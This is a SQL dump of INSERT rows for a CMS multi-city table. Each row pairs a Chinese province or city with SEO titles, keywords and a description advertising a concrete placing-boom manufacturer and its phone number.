INSERT INTO `ey_weapp_multicity` VALUES ('139', '130', '130', '濮阳市', '2', '1', '0', 'pys', '濮阳市液压布料机厂家', '濮阳市布料机价格,濮阳市液压布料机,濮阳市液压布料机厂家', '濮阳市布料机专业生产厂家联系电话:17858811257', '100', '1655192495', '1655192495');
INSERT INTO `ey_weapp_multicity` VALUES ('140', '130', '130', '许昌市', '2', '1', '0', 'xc', '许昌市混凝土布料机厂家', '许昌市混凝土布料机价格,许昌市混凝土布料机,许昌市混凝土布料机厂家', '许昌市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655192546', '1655192546');
INSERT INTO `ey_weapp_multicity` VALUES ('141', '130', '130', '漯河市', '2', '1', '0', 'lh', '漯河市混凝土布料机厂家', '漯河市混凝土布料机价格,漯河市混凝土布料机,漯河市混凝土布料机厂家', '漯河市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655192610', '1655192610');
INSERT INTO `ey_weapp_multicity` VALUES ('142', '130', '130', '三门峡市', '2', '1', '0', 'smx', '三门峡市液压布料机厂家', '三门峡市布料机价格,三门峡市液压布料机,三门峡市液压布料机厂家', '三门峡市布料机专业生产厂家联系电话:17858811257', '100', '1655192713', '1655192713');
INSERT INTO `ey_weapp_multicity` VALUES ('143', '130', '130', '南阳市', '2', '1', '0', 'nys', '南阳市混凝土布料机厂家', '南阳市混凝土布料机价格,南阳市混凝土布料机,南阳市混凝土布料机厂家', '南阳市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655192800', '1655192800');
INSERT INTO `ey_weapp_multicity` VALUES ('144', '130', '130', '商丘市', '2', '1', '0', 'sq', '商丘市液压布料机厂家', '商丘市布料机价格,商丘市液压布料机,商丘市液压布料机厂家', '商丘市布料机专业生产厂家联系电话:17858811257', '100', '1655192857', '1655192857');
INSERT INTO `ey_weapp_multicity` VALUES ('145', '130', '130', '信阳市', '2', '1', '0', 'xy', '信阳市液压布料机厂家', '信阳市布料机价格,信阳市液压布料机,信阳市液压布料机厂家', '信阳市布料机专业生产厂家联系电话:17858811257', '100', '1655192949', '1655192949');
INSERT INTO `ey_weapp_multicity` VALUES ('146', '130', '130', '周口市', '2', '1', '0', 'zk', '周口市液压布料机厂家', '周口市布料机价格,周口市液压布料机,周口市液压布料机厂家', '周口市布料机专业生产厂家联系电话:17858811257', '100', '1655193085', '1655193085');
INSERT INTO `ey_weapp_multicity` VALUES ('147', '130', '130', '驻马店市', '2', '1', '0', 'zmd', '驻马店市混凝土布料机厂家', '驻马店市混凝土布料机价格,驻马店市混凝土布料机,驻马店市混凝土布料机厂家', '驻马店市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655193239', '1655193239');
INSERT INTO `ey_weapp_multicity` VALUES ('148', '130', '130', '济源市', '2', '1', '0', 'qys', '济源市液压布料机厂家', '济源市布料机价格,济源市液压布料机,济源市液压布料机厂家', '济源市布料机专业生产厂家联系电话:17858811257', '100', '1655193328', '1655193328');
INSERT INTO `ey_weapp_multicity` VALUES ('149', '0', '0', '福建省', '1', '1', '0', 'fjs', '福建液压布料机厂家', '福建布料机价格,福建液压布料机,福建液压布料机厂家', '福建布料机专业生产厂家联系电话:17858811257', '100', '1655252985', '1655252985');
INSERT INTO `ey_weapp_multicity` VALUES ('150', '149', '149', '福州市', '2', '1', '0', 'fzs', '福州液压布料机厂家', '福州布料机价格,福州液压布料机,福州液压布料机厂家', '福州布料机专业生产厂家联系电话:17858811257', '100', '1655253106', '1655253106');
INSERT INTO `ey_weapp_multicity` VALUES ('151', '149', '149', '莆田市', '2', '1', '0', 'pt', '莆田混凝土布料机厂家', '莆田混凝土布料机价格,莆田混凝土布料机,莆田混凝土布料机厂家', '莆田混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655253347', '1655253347');
INSERT INTO `ey_weapp_multicity` VALUES ('152', '149', '149', '泉州市', '2', '1', '0', 'qz', '泉州液压布料机厂家', '泉州布料机价格,泉州液压布料机,泉州液压布料机厂家', '泉州布料机专业生产厂家联系电话:17858811257', '100', '1655253639', '1655253639');
INSERT INTO `ey_weapp_multicity` VALUES ('153', '149', '149', '漳州市', '2', '1', '0', 'zzs', '漳州液压布料机厂家', '漳州布料机价格,漳州液压布料机,漳州液压布料机厂家', '漳州布料机专业生产厂家联系电话:17858811257', '100', '1655253810', '1655253810');
INSERT INTO `ey_weapp_multicity` VALUES ('154', '149', '149', '龙岩市', '2', '1', '0', 'lys', '龙岩混凝土布料机厂家', '龙岩混凝土布料机价格,龙岩混凝土布料机,龙岩混凝土布料机厂家', '龙岩混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655253969', '1655253969');
INSERT INTO `ey_weapp_multicity` VALUES ('155', '149', '149', '三明市', '2', '1', '0', 'sms', '三明液压布料机厂家', '三明布料机价格,三明液压布料机,三明液压布料机厂家', '三明布料机专业生产厂家联系电话:17858811257', '100', '1655254021', '1655254021');
INSERT INTO `ey_weapp_multicity` VALUES ('156', '149', '149', '南平市', '2', '1', '0', 'nps', '南平液压布料机厂家', '南平布料机价格,南平液压布料机,南平液压布料机厂家', '南平布料机专业生产厂家联系电话:17858811257', '100', '1655255346', '1655255346');
INSERT INTO `ey_weapp_multicity` VALUES ('157', '149', '149', '宁德市', '2', '1', '0', 'nds', '宁德市混凝土布料机厂家', '宁德市混凝土布料机价格,宁德市混凝土布料机,宁德市混凝土布料机厂家', '宁德市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655255444', '1655255444');
INSERT INTO `ey_weapp_multicity` VALUES ('177', '168', '168', '沧州市', '2', '1', '0', 'cangzhou', '沧州液压布料机厂家', '沧州布料机价格,沧州液压布料机,沧州液压布料机厂家', '沧州布料机专业生产厂家联系电话:17858811257', '100', '1655261312', '1655261312');
INSERT INTO `ey_weapp_multicity` VALUES ('168', '0', '0', '河北省', '1', '1', '0', 'hebei', '河北液压布料机厂家', '河北布料机价格,河北液压布料机,河北液压布料机厂家', '河北省布料机专业生产厂家联系电话:17858811257', '100', '1655259373', '1655259373');
INSERT INTO `ey_weapp_multicity` VALUES ('169', '168', '168', '石家庄市', '2', '1', '0', 'sjzs', '石家庄混凝土布料机厂家', '石家庄混凝土布料机价格,石家庄混凝土布料机,石家庄混凝土布料机厂家', '石家庄混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655259882', '1655259882');
INSERT INTO `ey_weapp_multicity` VALUES ('170', '168', '168', '唐山市', '2', '1', '0', 'tss', '唐山市混凝土布料机厂家', '唐山市混凝土布料机价格,唐山市混凝土布料机,唐山市混凝土布料机厂家', '唐山市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655260398', '1655260398');
INSERT INTO `ey_weapp_multicity` VALUES ('171', '168', '168', '秦皇岛市', '2', '1', '0', 'qhds', '秦皇岛市液压布料机厂家', '秦皇岛市布料机价格,秦皇岛市液压布料机,秦皇岛市液压布料机厂家', '秦皇岛市布料机专业生产厂家联系电话:17858811257', '100', '1655260796', '1655260796');
INSERT INTO `ey_weapp_multicity` VALUES ('172', '168', '168', '邯郸市', '2', '1', '0', 'hds', '邯郸市混凝土布料机厂家', '邯郸市混凝土布料机价格,邯郸市混凝土布料机,邯郸市混凝土布料机厂家', '邯郸市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655260954', '1655260954');
INSERT INTO `ey_weapp_multicity` VALUES ('173', '168', '168', '邢台市', '2', '1', '0', 'xt', '邢台市液压布料机厂家', '邢台市布料机价格,邢台市液压布料机,邢台市液压布料机厂家', '邢台市布料机专业生产厂家联系电话:17858811257', '100', '1655261016', '1655261016');
INSERT INTO `ey_weapp_multicity` VALUES ('174', '168', '168', '保定市', '2', '1', '0', 'bds', '保定市液压布料机厂家', '保定市布料机价格,保定市液压布料机,保定市液压布料机厂家', '保定市布料机专业生产厂家联系电话:17858811257', '100', '1655261106', '1655261106');
INSERT INTO `ey_weapp_multicity` VALUES ('175', '168', '168', '张家口市', '2', '1', '0', 'zjk', '张家口市液压布料机厂家', '张家口市布料机价格,张家口市液压布料机,张家口市液压布料机厂家', '张家口市布料机专业生产厂家联系电话:17858811257', '100', '1655261197', '1655261197');
INSERT INTO `ey_weapp_multicity` VALUES ('176', '168', '168', '承德市', '2', '1', '0', 'cds', '承德市混凝土布料机厂家', '承德市混凝土布料机价格,承德市混凝土布料机,承德市混凝土布料机厂家', '承德市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655261253', '1655261253');
INSERT INTO `ey_weapp_multicity` VALUES ('178', '168', '168', '廊坊市', '2', '1', '0', 'lfs', '廊坊市混凝土布料机厂家', '廊坊市混凝土布料机价格,廊坊市混凝土布料机,廊坊市混凝土布料机厂家', '廊坊市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655261425', '1655261425');
INSERT INTO `ey_weapp_multicity` VALUES ('179', '168', '168', '衡水市', '2', '1', '0', 'hengshui', '衡水市液压布料机厂家', '衡水市布料机价格,衡水市液压布料机,v液压布料机厂家', '衡水市布料机专业生产厂家联系电话:17858811257', '100', '1655261490', '1655261490');
INSERT INTO `ey_weapp_multicity` VALUES ('180', '0', '0', '北京', '1', '1', '0', 'beijing', '北京液压布料机厂家', '北京布料机价格,北京液压布料机,北京液压布料机厂家', '北京布料机专业生产厂家联系电话:17858811257', '100', '1655261615', '1655261849');
INSERT INTO `ey_weapp_multicity` VALUES ('181', '0', '0', '山东省', '1', '1', '0', 'sds', '山东省液压布料机厂家', '山东布料机价格,山东液压布料机,山东液压布料机厂家', '山东布料机专业生产厂家联系电话:17858811257', '100', '1655262328', '1655262328');
INSERT INTO `ey_weapp_multicity` VALUES ('182', '181', '181', '济南市', '2', '1', '0', 'jns', '济南液压布料机厂家', '济南布料机价格,济南液压布料机,济南液压布料机厂家', '济南布料机专业生产厂家联系电话:17858811257', '100', '1655262522', '1655262522');
INSERT INTO `ey_weapp_multicity` VALUES ('184', '181', '181', '青岛市', '2', '1', '0', 'qds', '青岛混凝土布料机厂家', '青岛混凝土布料机价格,青岛混凝土布料机,青岛混凝土布料机厂家', '青岛混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655262686', '1655262686');
INSERT INTO `ey_weapp_multicity` VALUES ('185', '181', '181', '烟台市', '2', '1', '0', 'yts', '烟台市液压布料机厂家', '烟台布料机价格,烟台液压布料机,烟台液压布料机厂家', '烟台布料机专业生产厂家联系电话:17858811257', '100', '1655262753', '1655262753');
INSERT INTO `ey_weapp_multicity` VALUES ('186', '181', '181', '威海市', '2', '1', '0', 'weihai', '威海液压布料机厂家', '威海布料机价格,威海液压布料机,威海液压布料机厂家', '威海布料机专业生产厂家联系电话:17858811257', '100', '1655262894', '1655262894');
INSERT INTO `ey_weapp_multicity` VALUES ('187', '181', '181', '东营市', '2', '1', '0', 'dys', '东营混凝土布料机厂家', '东营混凝土布料机价格,东营混凝土布料机,东营混凝土布料机厂家', '东营混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655263074', '1655263074');
INSERT INTO `ey_weapp_multicity` VALUES ('188', '181', '181', '淄博市', '2', '1', '0', 'zbs', '淄博市液压布料机厂家', '淄博布料机价格,淄博液压布料机,淄博液压布料机厂家', '淄博布料机专业生产厂家联系电话:17858811257', '100', '1655263561', '1655263561');
INSERT INTO `ey_weapp_multicity` VALUES ('189', '181', '181', '潍坊市', '2', '1', '0', 'wfs', '潍坊市液压布料机厂家', '潍坊布料机价格,潍坊液压布料机,潍坊液压布料机厂家', '潍坊布料机专业生产厂家联系电话:17858811257', '100', '1655263696', '1655263696');
INSERT INTO `ey_weapp_multicity` VALUES ('190', '181', '181', '日照市', '2', '1', '0', 'rzs', '日照市液压布料机厂家', '日照市布料机价格,日照市液压布料机,日照市液压布料机厂家', '日照市布料机专业生产厂家联系电话:17858811257', '100', '1655269649', '1655269649');
INSERT INTO `ey_weapp_multicity` VALUES ('191', '181', '181', '莱芜市', '2', '1', '0', 'lw', '莱芜市液压布料机厂家', '莱芜市布料机价格,莱芜市液压布料机,莱芜市液压布料机厂家', '莱芜市布料机专业生产厂家联系电话:17858811257', '100', '1655269776', '1655269776');
INSERT INTO `ey_weapp_multicity` VALUES ('192', '181', '181', '菏泽市', '2', '1', '0', 'heze', '菏泽市混凝土布料机厂家', '菏泽市混凝土布料机价格,菏泽市混凝土布料机,菏泽市混凝土布料机厂家', '菏泽市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655269860', '1655269860');
INSERT INTO `ey_weapp_multicity` VALUES ('193', '181', '181', '枣庄市', '2', '1', '0', 'zaozhuang', '枣庄市液压布料机厂家', '枣庄市布料机价格,枣庄市液压布料机,枣庄市液压布料机厂家', '枣庄市布料机专业生产厂家联系电话:17858811257', '100', '1655270569', '1655270569');
INSERT INTO `ey_weapp_multicity` VALUES ('194', '181', '181', '德州市', '2', '1', '0', 'dz', '德州市混凝土布料机厂家', '德州市混凝土布料机价格,德州市混凝土布料机,德州市混凝土布料机厂家', '德州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655270654', '1655270654');
INSERT INTO `ey_weapp_multicity` VALUES ('195', '181', '181', '滨州市', '2', '1', '0', 'bz', '滨州液压布料机厂家', '滨州布料机价格,滨州液压布料机,滨州液压布料机厂家', '滨州布料机专业生产厂家联系电话:17858811257', '100', '1655270777', '1655270777');
INSERT INTO `ey_weapp_multicity` VALUES ('196', '181', '181', '临沂市', '2', '1', '0', 'lq', '临沂混凝土布料机厂家', '临沂混凝土布料机价格,临沂混凝土布料机,临沂混凝土布料机厂家', '临沂混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655270841', '1655270841');
INSERT INTO `ey_weapp_multicity` VALUES ('197', '181', '181', '济宁市', '2', '1', '0', 'jn', '济宁液压布料机厂家', '济宁布料机价格,济宁液压布料机,济宁液压布料机厂家', '济宁布料机专业生产厂家联系电话:17858811257', '100', '1655270909', '1655270909');
INSERT INTO `ey_weapp_multicity` VALUES ('198', '181', '181', '聊城市', '2', '1', '0', 'lc', '聊城混凝土布料机厂家', '聊城混凝土布料机价格,聊城混凝土布料机,聊城混凝土布料机厂家', '聊城混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655270978', '1655270978');
INSERT INTO `ey_weapp_multicity` VALUES ('199', '181', '181', '泰安市', '2', '1', '0', 'ta', '泰安市液压布料机厂家', '泰安市布料机价格,泰安市液压布料机,泰安市液压布料机厂家', '泰安市布料机专业生产厂家联系电话:17858811257', '100', '1655271042', '1655271042');
INSERT INTO `ey_weapp_multicity` VALUES ('200', '0', '0', '湖南省', '1', '1', '0', 'hunan', '湖南省液压布料机厂家', '湖南省布料机价格,湖南省液压布料机,湖南省液压布料机厂家', '湖南省布料机专业生产厂家联系电话:17858811257', '100', '1655271212', '1655271521');
INSERT INTO `ey_weapp_multicity` VALUES ('201', '200', '200', '长沙市', '2', '1', '0', 'cs', '长沙液压布料机厂家', '长沙布料机价格,长沙液压布料机,长沙液压布料机厂家', '长沙布料机专业生产厂家联系电话:17858811257', '100', '1655279148', '1655279148');
INSERT INTO `ey_weapp_multicity` VALUES ('202', '200', '200', '湘潭市', '2', '1', '0', 'xts', '湘潭混凝土布料机厂家', '湘潭混凝土布料机价格,湘潭混凝土布料机,湘潭混凝土布料机厂家', '湘潭混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655279234', '1655279234');
INSERT INTO `ey_weapp_multicity` VALUES ('203', '200', '200', '株洲市', '2', '1', '0', 'zhuzhou', '株洲液压布料机厂家', '株洲布料机价格,株洲液压布料机,株洲液压布料机厂家', '株洲布料机专业生产厂家联系电话:17858811257', '100', '1655279317', '1655279317');
INSERT INTO `ey_weapp_multicity` VALUES ('204', '200', '200', '衡阳市', '2', '1', '0', 'hengyang', '衡阳液压布料机厂家', '衡阳布料机价格,衡阳液压布料机,衡阳液压布料机厂家', '衡阳布料机专业生产厂家联系电话:17858811257', '100', '1655279594', '1655279594');
INSERT INTO `ey_weapp_multicity` VALUES ('205', '200', '200', '邵阳市', '2', '1', '0', 'sys', '邵阳混凝土布料机厂家', '邵阳混凝土布料机价格,邵阳混凝土布料机,邵阳混凝土布料机厂家', '邵阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655279676', '1655279676');
INSERT INTO `ey_weapp_multicity` VALUES ('206', '200', '200', '岳阳市', '2', '1', '0', 'yys', '岳阳液压布料机厂家', '岳阳布料机价格,岳阳液压布料机,岳阳液压布料机厂家', '岳阳布料机专业生产厂家联系电话:17858811257', '100', '1655279790', '1655279790');
INSERT INTO `ey_weapp_multicity` VALUES ('207', '200', '200', '常德市', '2', '1', '0', 'cd', '常德混凝土布料机厂家', '常德混凝土布料机价格,常德混凝土布料机,常德混凝土布料机厂家', '常德混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655279951', '1655279951');
INSERT INTO `ey_weapp_multicity` VALUES ('208', '200', '200', '张家界市', '2', '1', '0', 'zjjs', '张家界液压布料机厂家', '张家界布料机价格,张家界液压布料机,张家界液压布料机厂家', '张家界布料机专业生产厂家联系电话:17858811257', '100', '1655280149', '1655280149');
INSERT INTO `ey_weapp_multicity` VALUES ('209', '200', '200', '郴州市', '2', '1', '0', 'chengzhou', '郴州混凝土布料机厂家', '郴州混凝土布料机价格,郴州混凝土布料机,郴州混凝土布料机厂家', '郴州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655280236', '1655280236');
INSERT INTO `ey_weapp_multicity` VALUES ('210', '200', '200', '益阳市', '2', '1', '0', 'yy', '益阳混凝土布料机厂家', '益阳混凝土布料机价格,益阳混凝土布料机,益阳混凝土布料机厂家', '益阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655280341', '1655280341');
INSERT INTO `ey_weapp_multicity` VALUES ('211', '200', '200', '永州市', '2', '1', '0', 'yz', '永州液压布料机厂家', '永州布料机价格,永州液压布料机,永州液压布料机厂家', '永州布料机专业生产厂家联系电话:17858811257', '100', '1655280397', '1655280397');
INSERT INTO `ey_weapp_multicity` VALUES ('212', '200', '200', '怀化市', '2', '1', '0', 'hhs', '怀化混凝土布料机厂家', '怀化混凝土布料机价格,怀化混凝土布料机,怀化混凝土布料机厂家', '怀化混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655280464', '1655280464');
INSERT INTO `ey_weapp_multicity` VALUES ('213', '200', '200', '娄底市', '2', '1', '0', 'lds', '娄底液压布料机厂家', '娄底布料机价格,娄底液压布料机,娄底液压布料机厂家', '娄底布料机专业生产厂家联系电话:17858811257', '100', '1655280534', '1655280534');
INSERT INTO `ey_weapp_multicity` VALUES ('214', '200', '200', '湘西土家族苗族自治州', '2', '1', '0', 'xxz', '湘西州混凝土布料机厂家', '湘西州混凝土布料机价格,湘西州混凝土布料机,湘西州混凝土布料机厂家', '湘西州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655280616', '1655280616');
INSERT INTO `ey_weapp_multicity` VALUES ('215', '0', '0', '四川省', '1', '1', '0', 'scs', '四川混凝土布料机厂家', '四川混凝土布料机价格,四川混凝土布料机,四川混凝土布料机厂家', '四川混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655281819', '1655281819');
INSERT INTO `ey_weapp_multicity` VALUES ('216', '215', '215', '成都市', '2', '1', '0', 'chengdushi', '成都市混凝土布料机厂家', '成都混凝土布料机价格,成都混凝土布料机,成都混凝土布料机厂家', '成都混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655281887', '1655281887');
INSERT INTO `ey_weapp_multicity` VALUES ('217', '215', '215', '绵阳市', '2', '1', '0', 'mys', '绵阳液压布料机厂家', '绵阳布料机价格,绵阳液压布料机,绵阳液压布料机厂家', '绵阳布料机专业生产厂家联系电话:17858811257', '100', '1655281965', '1655281965');
INSERT INTO `ey_weapp_multicity` VALUES ('218', '215', '215', '自贡市', '2', '1', '0', 'zgs', '自贡市混凝土布料机厂家', '自贡混凝土布料机价格,自贡混凝土布料机,自贡混凝土布料机厂家', '自贡混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655282032', '1655282032');
INSERT INTO `ey_weapp_multicity` VALUES ('219', '215', '215', '攀枝花市', '2', '1', '0', 'pzhs', '攀枝花液压布料机厂家', '攀枝花布料机价格,攀枝花液压布料机,攀枝花液压布料机厂家', '攀枝花布料机专业生产厂家联系电话:17858811257', '100', '1655282093', '1655282093');
INSERT INTO `ey_weapp_multicity` VALUES ('220', '215', '215', '泸州市', '2', '1', '0', 'lzs', '泸州市混凝土布料机厂家', '泸州混凝土布料机价格,泸州混凝土布料机,泸州混凝土布料机厂家', '泸州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655282343', '1655282343');
INSERT INTO `ey_weapp_multicity` VALUES ('221', '215', '215', '德阳市', '2', '1', '0', 'deyang', '德阳混凝土布料机厂家', '德阳混凝土布料机价格,德阳混凝土布料机,德阳混凝土布料机厂家', '德阳混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655283164', '1655283164');
INSERT INTO `ey_weapp_multicity` VALUES ('222', '215', '215', '广元市', '2', '1', '0', 'gys', '广元混凝土布料机厂家', '广元混凝土布料机价格,广元混凝土布料机,广元混凝土布料机厂家', '广元混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655284129', '1655284129');
INSERT INTO `ey_weapp_multicity` VALUES ('223', '215', '215', '遂宁市', '2', '1', '0', 'sns', '遂宁液压布料机厂家', '遂宁布料机价格,遂宁液压布料机,遂宁液压布料机厂家', '遂宁布料机专业生产厂家联系电话:17858811257', '100', '1655284263', '1655284263');
INSERT INTO `ey_weapp_multicity` VALUES ('224', '215', '215', '内江市', '2', '1', '0', 'njs', '内江液压布料机厂家', '内江布料机价格,内江液压布料机,内江液压布料机厂家', '内江布料机专业生产厂家联系电话:17858811257', '100', '1655284412', '1655284412');
INSERT INTO `ey_weapp_multicity` VALUES ('225', '215', '215', '乐山市', '2', '1', '0', 'lss', '乐山混凝土布料机厂家', '乐山混凝土布料机价格,乐山混凝土布料机,乐山混凝土布料机厂家', '乐山混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655339495', '1655339495');
INSERT INTO `ey_weapp_multicity` VALUES ('226', '215', '215', '资阳市', '2', '1', '0', 'zy', '资阳市混凝土布料机厂家', '资阳市混凝土布料机价格,资阳市混凝土布料机,资阳市锡混凝土布料机厂家', '资阳市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655339617', '1655339617');
INSERT INTO `ey_weapp_multicity` VALUES ('227', '215', '215', '宜宾市', '2', '1', '0', 'yb', '宜宾液压布料机厂家', '宜宾布料机价格,宜宾液压布料机,宜宾液压布料机厂家', '宜宾布料机专业生产厂家联系电话:17858811257', '100', '1655339797', '1655339797');
INSERT INTO `ey_weapp_multicity` VALUES ('228', '215', '215', '南充市', '2', '1', '0', 'ncs', '南充混凝土布料机厂家', '南充混凝土布料机价格,南充混凝土布料机,南充混凝土布料机厂家', '南充市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655339893', '1655339893');
INSERT INTO `ey_weapp_multicity` VALUES ('229', '215', '215', '达州市', '2', '1', '0', 'dzs', '达州市混凝土布料机厂家', '达州市混凝土布料机价格,达州市混凝土布料机,达州市混凝土布料机厂家', '达州市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655340103', '1655340103');
INSERT INTO `ey_weapp_multicity` VALUES ('230', '215', '215', '雅安市', '2', '1', '0', 'yas', '雅安液压布料机厂家', '雅安布料机价格,雅安液压布料机,雅安液压布料机厂家', '雅安布料机专业生产厂家联系电话:17858811257', '100', '1655340166', '1655340166');
INSERT INTO `ey_weapp_multicity` VALUES ('231', '215', '215', '广安市', '2', '1', '0', 'ga', '广安市液压布料机厂家', '广安市布料机价格,广安市液压布料机,广安市液压布料机厂家', '广安市布料机专业生产厂家联系电话:17858811257', '100', '1655340230', '1655340230');
INSERT INTO `ey_weapp_multicity` VALUES ('232', '215', '215', '巴中市', '2', '1', '0', 'bzs', '巴中混凝土布料机厂家', '巴中混凝土布料机价格,巴中混凝土布料机,巴中混凝土布料机厂家', '巴中混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655340386', '1655340386');
INSERT INTO `ey_weapp_multicity` VALUES ('233', '215', '215', '眉山市', '2', '1', '0', 'ms', '眉山液压布料机厂家', '眉山布料机价格,眉山液压布料机,眉山液压布料机厂家', '眉山布料机专业生产厂家联系电话:17858811257', '100', '1655340456', '1655340456');
INSERT INTO `ey_weapp_multicity` VALUES ('235', '0', '0', '江西省', '1', '1', '0', 'jx', '江西省混凝土布料机厂家', '江西省混凝土布料机价格,江西省混凝土布料机,江西省混凝土布料机厂家', '江西省混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655341875', '1655341875');
INSERT INTO `ey_weapp_multicity` VALUES ('236', '235', '235', '南昌市', '2', '1', '0', 'nc', '南昌混凝土布料机厂家', '南昌混凝土布料机价格,南昌混凝土布料机,南昌混凝土布料机厂家', '南昌混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655341946', '1655341946');
INSERT INTO `ey_weapp_multicity` VALUES ('237', '235', '235', '九江市', '2', '1', '0', 'jjs', '九江液压布料机厂家', '九江布料机价格,九江液压布料机,九江液压布料机厂家', '九江布料机专业生产厂家联系电话:17858811257', '100', '1655342206', '1655342206');
INSERT INTO `ey_weapp_multicity` VALUES ('238', '235', '235', '上饶市', '2', '1', '0', 'srs', '上饶液压布料机厂家', '上饶布料机价格,上饶液压布料机,上饶液压布料机厂家', '上饶布料机专业生产厂家联系电话:17858811257', '100', '1655342355', '1655342367');
INSERT INTO `ey_weapp_multicity` VALUES ('239', '235', '235', '抚州市', '2', '1', '0', 'wz', '抚州混凝土布料机厂家', '抚州混凝土布料机价格,抚州混凝土布料机,抚州混凝土布料机厂家', '抚州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655342453', '1655342453');
INSERT INTO `ey_weapp_multicity` VALUES ('240', '235', '235', '宜春市', '2', '1', '0', 'yichun', '宜春混凝土布料机厂家', '宜春混凝土布料机价格,宜春混凝土布料机,宜春混凝土布料机厂家', '宜春混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655342570', '1655342570');
INSERT INTO `ey_weapp_multicity` VALUES ('241', '235', '235', '吉安市', '2', '1', '0', 'jas', '吉安液压布料机厂家', '吉安布料机价格,吉安液压布料机,吉安液压布料机厂家', '吉安布料机专业生产厂家联系电话:17858811257', '100', '1655342810', '1655342810');
INSERT INTO `ey_weapp_multicity` VALUES ('242', '235', '235', '赣州市', '2', '1', '0', 'gz', '赣州混凝土布料机厂家', '赣州混凝土布料机价格,赣州混凝土布料机,赣州混凝土布料机厂家', '赣州混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655343199', '1655343199');
INSERT INTO `ey_weapp_multicity` VALUES ('243', '235', '235', '景德镇市', '2', '1', '0', 'jdzs', '景德镇混凝土布料机专业生产厂家联系电话:17858811257', '景德镇混凝土布料机价格,景德镇混凝土布料机,景德镇混凝土布料机厂家', '景德镇混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655343303', '1655343303');
INSERT INTO `ey_weapp_multicity` VALUES ('244', '235', '235', '萍乡市', '2', '1', '0', 'pxs', '萍乡市混凝土布料机厂家', '萍乡市混凝土布料机价格,萍乡市混凝土布料机,萍乡市锡混凝土布料机厂家', '萍乡市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655343533', '1655343533');
INSERT INTO `ey_weapp_multicity` VALUES ('245', '235', '235', '新余市', '2', '1', '0', 'xinyu', '新余液压布料机厂家', '新余布料机价格,新余液压布料机,新余液压布料机厂家', '新余布料机专业生产厂家联系电话:17858811257', '100', '1655343607', '1655343607');
INSERT INTO `ey_weapp_multicity` VALUES ('246', '235', '235', '鹰潭市', '2', '1', '0', 'yt', '鹰潭市混凝土布料机厂家', '鹰潭市混凝土布料机价格,鹰潭市混凝土布料机,鹰潭市混凝土布料机厂家', '鹰潭市混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655343664', '1655343664');
INSERT INTO `ey_weapp_multicity` VALUES ('247', '0', '0', '山西省', '1', '1', '0', 'sx', '山西液压布料机厂家', '山西布料机价格,山西液压布料机,山西液压布料机厂家', '山西布料机专业生产厂家联系电话:17858811257', '100', '1655344414', '1655344414');
INSERT INTO `ey_weapp_multicity` VALUES ('248', '247', '247', '太原市', '2', '1', '0', 'tys', '太原市液压布料机厂家', '太原市布料机价格,太原市液压布料机,太原市液压布料机厂家', '太原市布料机专业生产厂家联系电话:17858811257', '100', '1655344770', '1655344770');
INSERT INTO `ey_weapp_multicity` VALUES ('249', '247', '247', '临汾市', '2', '1', '0', 'lf', '临汾液压布料机厂家', '临汾布料机价格,临汾液压布料机,临汾液压布料机厂家', '临汾布料机专业生产厂家联系电话:17858811257', '100', '1655344896', '1655344896');
INSERT INTO `ey_weapp_multicity` VALUES ('250', '247', '247', '朔州市', '2', '1', '0', 'shuozhou', '朔州液压布料机厂家', '朔州布料机价格,朔州液压布料机,朔州液压布料机厂家', '朔州布料机专业生产厂家联系电话:17858811257', '100', '1655345000', '1655345000');
INSERT INTO `ey_weapp_multicity` VALUES ('251', '247', '247', '大同市', '2', '1', '0', 'dts', '大同市液压布料机厂家', '大同市布料机价格,大同市液压布料机,大同市液压布料机厂家', '大同市布料机专业生产厂家联系电话:17858811257', '100', '1655345061', '1655345061');
INSERT INTO `ey_weapp_multicity` VALUES ('252', '247', '247', '长治市', '2', '1', '0', 'changzhishi', '长治市液压布料机厂家', '长治布料机价格,长治液压布料机,长治液压布料机厂家', '长治布料机专业生产厂家联系电话:17858811257', '100', '1655345161', '1655345161');
INSERT INTO `ey_weapp_multicity` VALUES ('253', '247', '247', '吕梁市', '2', '1', '0', 'lls', '吕梁市混凝土布料机厂家', '吕梁混凝土布料机价格,吕梁混凝土布料机,吕梁混凝土布料机厂家', '吕梁混凝土布料机专业生产厂家联系电话:17858811257', '100', '1655345289', '1655345289');
